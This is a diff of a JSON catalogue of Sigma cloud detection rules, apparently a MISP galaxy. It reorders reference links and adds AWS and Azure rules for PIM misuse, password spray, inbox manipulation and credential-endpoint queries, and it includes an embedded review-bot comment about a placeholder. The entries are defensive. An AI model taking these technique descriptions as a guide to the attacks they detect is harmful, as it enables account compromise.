 "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#audit-log-actions",
+ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-two-factor-authentication-for-your-organization/requiring-two-factor-authentication-in-your-organization",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_outside_collaborator_detected.yml"
 ],
 "tags": [
@@ -80291,9 +81845,9 @@
 "logsource.category": "No established category",
 "logsource.product": "github",
 "refs": [
- "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository",
- "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions",
 "https://docs.github.com/en/organizations/managing-oauth-access-to-your-organizations-data/disabling-oauth-app-access-restrictions-for-your-organization",
+ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#dependabot_alerts-category-actions",
+ "https://docs.github.com/en/repositories/managing-your-repositorys-settings-and-features/enabling-features-for-your-repository/managing-security-and-analysis-settings-for-your-repository",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_disable_high_risk_configuration.yml"
 ],
 "tags": [
@@ -80330,8 +81884,8 @@
 "logsource.category": "No established category",
 "logsource.product": "github",
 "refs": [
- "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation",
 "https://docs.github.com/en/actions/hosting-your-own-runners/about-self-hosted-runners#about-self-hosted-runners",
+ "https://docs.github.com/en/organizations/keeping-your-organization-secure/managing-security-settings-for-your-organization/reviewing-the-audit-log-for-your-organization#search-based-on-operation",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/github/github_self_hosted_runner_changes_detected.yml"
 ],
 "tags": [
@@ -80517,8 +82071,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://github.com/elastic/detection-rules/pull/1267",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://github.com/elastic/detection-rules/pull/1267",
 "https://kubernetes.io/docs/reference/kubernetes-api/authorization-resources/cluster-role-v1/#ClusterRole",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control",
 "https://kubernetes.io/docs/reference/access-authn-authz/rbac/",
@@ -80569,9 +82123,9 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://cloud.google.com/kubernetes-engine/docs",
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
 "https://kubernetes.io/docs/concepts/workloads/controllers/job/",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
+ "https://cloud.google.com/kubernetes-engine/docs",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_kubernetes_cronjob.yml"
 ],
 "tags": [
@@ -80799,8 +82353,8 @@
 "logsource.category": "No established category",
 "logsource.product": "gcp",
 "refs": [
- "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
 "https://cloud.google.com/kubernetes-engine/docs/how-to/audit-logging",
+ "https://developers.google.com/resources/api-libraries/documentation/compute/v1/java/latest/com/google/api/services/compute/Compute.PacketMirrorings.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gcp/gcp_full_network_traffic_packet_capture.yml"
 ],
 "tags": [
@@ -80833,9 +82387,9 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
 "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
 "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION_FROM_WHITELIST",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings?hl=en#REMOVE_APPLICATION",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_application_removed.yml"
 ],
 "tags": [
@@ -80940,9 +82494,9 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION",
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION",
 "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings?hl=en#ALLOW_STRONG_AUTHENTICATION",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-security-settings#ENFORCE_STRONG_AUTHENTICATION",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_mfa_disabled.yml"
 ],
 "tags": [
@@ -80965,8 +82519,8 @@
 "logsource.category": "No established category",
 "logsource.product": "google_workspace",
 "refs": [
- "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS",
 "https://cloud.google.com/logging/docs/audit/gsuite-audit-logging#3",
+ "https://developers.google.com/admin-sdk/reports/v1/appendix/activity/admin-domain-settings#AUTHORIZE_API_CLIENT_ACCESS",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/gworkspace/gworkspace_granted_domain_api_access.yml"
 ],
 "tags": [
@@ -81045,12 +82599,12 @@
 "logsource.category": "No established category",
 "logsource.product": "aws",
 "refs": [
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
 "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html",
 "https://github.com/elastic/detection-rules/pull/1145/files",
- "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html",
+ "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html",
 "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml"
 ],
@@ -81329,8 +82883,8 @@
 "logsource.category": "No established category",
 "logsource.product": "aws",
 "refs": [
- "https://github.com/elastic/detection-rules/pull/1214",
 "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html",
+ "https://github.com/elastic/detection-rules/pull/1214",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml"
 ],
 "tags": [
@@ -81563,6 +83117,48 @@
 "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599",
 "value": "Restore Public AWS RDS Instance"
 },
+ {
+ "description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"\".",
+ "meta": {
+ "author": "daniel.bohannon@permiso.io (@danielhbohannon)",
+ "creation_date": "2023/05/17",
+ "falsepositive": [
+ "Valid usage of S3 browser with accidental creation of default Inline IAM policy without changing default S3 bucket name placeholder value"
+ ],
+ "filename": "aws_iam_s3browser_templated_s3_bucket_policy_creation.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "aws",
+ "refs": [
+ "https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_s3browser_templated_s3_bucket_policy_creation.yml"
+ ],
+ "tags": [
+ "attack.execution",
+ "attack.t1059.009",
+ "attack.persistence",
+ "attack.t1078.004"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "f232fa7a-025c-4d43-abc7-318e81a73d65",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "db014773-7375-4f4e-b83b-133337c0ffee",
+ "value": "AWS IAM S3Browser Templated S3 Bucket Policy Creation"
+ },
 {
 "description": "Detects disabling, deleting and updating of a Trail",
 "meta": {
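Review bot: The description of the new AWS IAM S3Browser entry (second hunk on this line) quotes an empty placeholder, `placeholder value of \"\"`, so the one detail an analyst needs to recognise the templated policy, the literal default bucket-name token, is absent from the cluster text. The upstream rule listed in refs presumably carries that token, and an angle-bracketed value is easy to lose when the YAML is converted, so the string should be checked against the source rule and restored, e.g. `"description": "Detects S3 browser utility creating Inline IAM policy containing default S3 bucket name placeholder value of \"<PLACEHOLDER: default bucket-name token from the upstream rule>\"."`. The falsepositive text in the same entry refers to the "default S3 bucket name placeholder value" without naming it either, so both strings are best corrected together.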
@@ -81659,8 +83255,8 @@
 "logsource.product": "aws",
 "refs": [
 "https://github.com/Lifka/hacking-resources/blob/c2ae355d381bd0c9f0b32c4ead049f44e5b1573f/cloud-hacking-cheat-sheets.md",
- "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
 "https://securitycafe.ro/2022/12/14/aws-enumeration-part-ii-practical-enumeration/",
+ "https://jamesonhacking.blogspot.com/2020/12/pivoting-to-private-aws-s3-buckets.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_buckets.yml"
 ],
 "tags": [
@@ -81766,8 +83362,8 @@
 "logsource.category": "No established category",
 "logsource.product": "aws",
 "refs": [
- "https://github.com/elastic/detection-rules/pull/1213",
 "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html",
+ "https://github.com/elastic/detection-rules/pull/1213",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml"
 ],
 "tags": [
@@ -81817,9 +83413,9 @@
 "logsource.category": "No established category",
 "logsource.product": "aws",
 "refs": [
- "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
 "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/ecs__backdoor_task_def/main.py",
 "https://docs.aws.amazon.com/AmazonECS/latest/developerguide/task-iam-roles.html",
+ "https://docs.aws.amazon.com/AmazonECS/latest/APIReference/API_RegisterTaskDefinition.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_ecs_task_definition_cred_endpoint_query.yml"
 ],
 "tags": [
@@ -81951,8 +83547,8 @@
 "logsource.category": "No established category",
 "logsource.product": "aws",
 "refs": [
- "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
 "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml",
+ "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html",
 "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml"
 ],
@@ -83299,9 +84895,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cluster_created_or_deleted.yml"
 ],
@@ -83583,8 +85179,8 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
- "https://blooteem.com/march-2022",
 "https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/",
+ "https://blooteem.com/march-2022",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_suspicious_signin_bypassing_mfa.yml"
 ],
 "tags": [
@@ -84422,9 +86018,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_secret_or_config_object_access.yml"
 ],
@@ -84493,9 +86089,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_role_access.yml"
 ],
@@ -84674,9 +86270,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_container_registry_created_or_deleted.yml"
 ],
@@ -84818,9 +86414,9 @@
 "logsource.category": "No established category",
 "logsource.product": "azure",
 "refs": [
- "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
- "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://kubernetes.io/docs/concepts/workloads/controllers/job/",
+ "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
+ "https://kubernetes.io/docs/concepts/workloads/controllers/cron-jobs/",
 "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_cronjob.yml"
 ],
@@ -84924,9 +86520,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_rolebinding_modified_or_deleted.yml"
 ],
@@ -85557,9 +87153,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_network_policy_change.yml"
 ],
@@ -85586,9 +87182,9 @@
 "logsource.product": "azure",
 "refs": [
 "https://attack.mitre.org/matrices/enterprise/cloud/",
- "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
- "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
 "https://www.microsoft.com/security/blog/2021/03/23/secure-containerized-environments-with-updated-threat-matrix-for-kubernetes/",
+ "https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/",
+ "https://medium.com/mitre-engenuity/att-ck-for-containers-now-available-4c2359654bf1",
 "https://docs.microsoft.com/en-us/azure/role-based-access-control/resource-provider-operations#microsoftkubernetes",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_kubernetes_service_account_modified_or_deleted.yml"
 ],
@@ -85609,6 +87205,695 @@
 "uuid": "12d027c3-b48c-4d9d-8bb6-a732200034b2",
 "value": "Azure Kubernetes Service Account Modified or Deleted"
 },
+ {
+ "description": "Identifies an event where there are there are too many accounts assigned the Global Administrator role.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate if threshold setting in PIM is too low."
+ ],
+ "filename": "azure_pim_too_many_global_admins.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "7bbc309f-e2b1-4eb1-8369-131a367d67d3",
+ "value": "Too Many Global Admins"
+ },
+ {
+ "description": "Identifies when a user has been assigned a privilege role and are not using that role.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate if potential generic account that cannot be removed."
+ ],
+ "filename": "azure_pim_role_not_used.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "8c6ec464-4ae4-43ac-936a-291da66ed13d",
+ "value": "Roles Are Not Being Used"
+ },
+ {
+ "description": "Identifies when the same privilege role has multiple activations by the same user.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate where if active time period for a role is set too short."
+ ],
+ "filename": "azure_pim_role_frequent_activation.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "645fd80d-6c07-435b-9e06-7bc1b5656cba",
+ "value": "Roles Activated Too Frequently"
+ },
+ {
+ "description": "Identifies when an organization doesn't have the proper license for PIM and is out of compliance.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate if licenses have expired."
+ ],
+ "filename": "azure_pim_invalid_license.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "58af08eb-f9e1-43c8-9805-3ad9b0482bd8",
+ "value": "Invalid PIM License"
+ },
+ {
+ "description": "Identifies when a privilege role can be activated without performing mfa.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate if user is performing MFA at sign-in."
+ ],
+ "filename": "azure_pim_role_no_mfa_required.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "94a66f46-5b64-46ce-80b2-75dcbe627cc0",
+ "value": "Roles Activation Doesn't Require MFA"
+ },
+ {
+ "description": "Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there."
+ ],
+ "filename": "azure_pim_role_assigned_outside_of_pim.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "b1bc08d1-8224-4758-a0e6-fbcfc98c73bb",
+ "value": "Roles Assigned Outside PIM"
+ },
+ {
+ "description": "Identifies when an account hasn't signed in during the past n number of days.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/14",
+ "falsepositive": [
+ "Investigate if potential generic account that cannot be removed."
+ ],
+ "filename": "azure_pim_account_stale.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml"
+ ],
+ "tags": [
+ "attack.t1078",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "e402c26a-267a-45bd-9615-bd9ceda6da85",
+ "value": "Stale Accounts In A Privileged Role"
+ },
+ {
+ "description": "Indicates that a password spray attack has been successfully performed.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user."
+ ],
+ "filename": "azure_identity_protection_password_spray.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#password-spray",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_password_spray.yml"
+ ],
+ "tags": [
+ "attack.t1110",
+ "attack.credential_access"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "28ecba0a-c743-4690-ad29-9a8f6f25a6f9",
+ "value": "Password Spray Activity"
+ },
+ {
+ "description": "Detects suspicious rules that delete or move messages or folders are set on a user's inbox.",
+ "meta": {
+ "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/09/03",
+ "falsepositive": [
+ "Actual mailbox rules that are moving items based on their workflow."
+ ],
+ "filename": "azure_identity_protection_inbox_manipulation.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins",
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-inbox-manipulation-rules",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_inbox_manipulation.yml"
+ ],
+ "tags": [
+ "attack.t1140",
+ "attack.defense_evasion"
+ ]
+ },
+ "related": [
+ {
+ "dest-uuid": "3ccef7ae-cb5e-48f6-8302-897105fbf55c",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
+ "uuid": "ceb55fd0-726e-4656-bf4e-b585b7f7d572",
+ "value": "Suspicious Inbox Manipulation Rules"
+ },
+ {
+ "description": "Indicates sign-ins from an anonymous IP address, for example, using an anonymous browser or VPN.",
+ "meta": {
+ "author": "Gloria Lee, '@gleeiamglo'",
+ "creation_date": "2023/08/22",
+ "falsepositive": [
+ "We recommend investigating the sessions flagged by this detection in the context of other sign-ins"
+ ],
+ "filename": "azure_identity_protection_anonymous_ip_address.yml",
+ "level": "high",
+ "logsource.category": "No established category",
+ "logsource.product": "azure",
+ "refs": [
+ "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anonymous-ip-address",
